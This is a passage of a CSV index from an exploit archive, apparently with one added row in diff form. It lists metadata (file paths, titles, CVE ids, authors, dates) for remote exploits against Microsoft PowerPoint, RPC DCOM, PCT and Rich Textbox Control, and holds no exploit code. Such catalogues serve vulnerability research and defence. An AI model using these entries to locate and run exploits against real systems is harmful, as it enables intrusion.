Closure Memory Corruption",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3656;OSVDB-27327,,,,,https://www.securityfocus.com/bid/18993/info 28224,exploits/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3655;OSVDB-27325,,,,,https://www.securityfocus.com/bid/18993/info 28225,exploits/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2017-11-22,1,CVE-2006-3660;OSVDB-27326,,,,,https://www.securityfocus.com/bid/18993/info +52351,exploits/windows/remote/52351.py,"Microsoft PowerPoint 2019 - Remote Code Execution (RCE)",2025-07-08,"Mohammed Idrees Banyamer",remote,windows,,2025-07-08,2025-07-08,0,CVE-2025-47175,,,,, 16334,exploits/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-07,1,CVE-2003-0719;OSVDB-5250;MS04-011,"Metasploit Framework (MSF)",,,, 4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,remote,windows,,2008-01-08,2016-11-14,1,CVE-2008-0237,,,,, 16749,exploits/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,remote,windows,,2011-01-11,2011-03-06,1,CVE-2003-0352;OSVDB-2100;MS03-026,"Metasploit Framework (MSF)",,,,